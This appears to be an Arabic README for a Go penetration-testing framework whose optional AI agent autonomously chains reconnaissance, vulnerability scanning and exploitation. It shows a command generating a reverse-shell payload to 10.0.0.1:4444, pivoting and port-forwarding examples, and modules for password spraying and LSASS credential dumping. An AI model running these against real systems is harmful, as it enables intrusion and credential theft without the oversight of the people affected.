
إطار عمل لاختبار الاختراق مع محرك قرارات مدعوم بالذكاء الاصطناعي
إطار اختبار اختراق أصلي لنظام ويندوز مكتوب بلغة Go. بنية معيارية مع محرك قرارات مدفوع بالذكاء الاصطناعي (واجهة برمجة تطبيقات متوافقة مع OpenAI).
go build -ldflags="-X main.version=$(git describe --tags)" -o FUCKER.exe ./cmd/fucker/
تجميع متقاطع:
GOOS=linux GOARCH=amd64 go build -o FUCKER_linux_amd64 ./cmd/fucker/
GOOS=windows GOARCH=amd64 go build -o FUCKER_win_amd64.exe ./cmd/fucker/
GOOS=windows GOARCH=386 go build -o FUCKER_win_386.exe ./cmd/fucker/
FUCKER.exe -t example.com -portscan -fingerprint -vulnscan -report
FUCKER.exe -t example.com -subdomain -dirbuster
FUCKER.exe -socks 1080
FUCKER.exe -forward 3389:192.168.1.100:3389
FUCKER.exe -payload "revshell|10.0.0.1|4444"
انسخ .env.example إلى .env:
بدون إعدادات الذكاء الاصطناعي، تعمل الأداة في وضع سطر الأوامر اليدوي (تعمل جميع الخيارات بشكل طبيعي).
عند تعيين OPENAI_API_KEY، تشغل الأداة حلقة ReAct: يقرر وكيل الذكاء الاصطناعي الأدوات التي سيستدعيها بناءً على النتائج السابقة. يحدد موجه النظام سير عمل اختبار الاختراق: الاستطلاع -> البصمة -> فحص الثغرات -> الاستغلال -> التقرير.
بدون الذكاء الاصطناعي، تتوفر جميع الوظائف عبر خيارات سطر الأوامر.
| الخيار | الوصف |
|---|
-t | النطاق/عنوان IP/رابط الهدف |
-p | المنافذ (مفصولة بفواصل أو نطاق، الافتراضي: 80,443,22,21,3389,3306,6379,27017) |
-subdomain | تعداد النطاقات الفرعية |
-portscan | فحص منافذ TCP |
-fingerprint | تحديد بصمة الخدمات |
-dirbuster | تخمين الأدلة بالقوة الغاشمة |
-vulnscan | فحص الثغرات القائم على POC |
-logic | فحوصات ثغرات المنطق |
-spray | رش كلمات المرور |
-exploit | وحدات الاستغلال |
-report | إنشاء تقرير HTML وJSON |
-o | ملف الإخراج (الافتراضي: report.html) |
-socks | بدء بروكسي SOCKS5 على المنفذ |
-httpproxy | بدء بروكسي HTTP على المنفذ |
-forward | إعادة توجيه المنافذ (محلي:مضيف:بعيد) |
-payload | توليد حمولة (revshell|IP|PORT) |
-v | تفصيلي |
-debug | مخرجات التصحيح |
-workers | العمال المتزامنون (الافتراضي: 20) |
-timeout | مهلة الطلب بالثواني (الافتراضي: 30) |
-proxy | رابط البروكسي |
-audit | مسار سجل التدقيق (الافتراضي: audit.json) |
| المتغير | الوصف |
|---|
OPENAI_BASE_URL | الرابط الأساسي لواجهة برمجة تطبيقات متوافقة مع OpenAI |
OPENAI_API_KEY | مفتاح واجهة برمجة التطبيقات |
OPENAI_MODEL_NAME | النموذج (الافتراضي: gpt-4) |
PROXY | رابط البروكسي |
MAX_WORKERS | الحد الأقصى للعمال (الافتراضي: 20) |
REQUEST_TIMEOUT | مهلة الطلب بالثواني (الافتراضي: 30) |
RETRY_COUNT | عدد المحاولات (الافتراضي: 3) |
| الحزمة | الوصف |
|---|
cmd/fucker/ | نقطة الدخول، تحليل سطر الأوامر، تنسيق الوحدات |
internal/ai/ | عميل OpenAI، حلقة وكيل ReAct، نظام الأدوات |
internal/scanner/ | فحص المنافذ، النطاقات الفرعية، البصمة، تخمين الأدلة |
internal/vuln/ | محرك POC بصيغة YAML، 16 POC مدمجة، فاحصات المنطق |
internal/exploit/ | مولّد القشرة العكسية، بروكسي SOCKS5/HTTP، القشرة في الذاكرة (memshell) |
internal/lateral/ | رش كلمات المرور، تفريغ LSASS، بروكسي SMB/RDP |
internal/report/ | تقرير قالب HTML، تصدير JSON، تقييم المخاطر |
internal/logger/ | تسجيل متدرج المستويات، سجل audit.json |
internal/plugin/ | محمل إضافات Python/Go |
internal/config/ | محمل .env |
internal/common/ | أنواع مشتركة |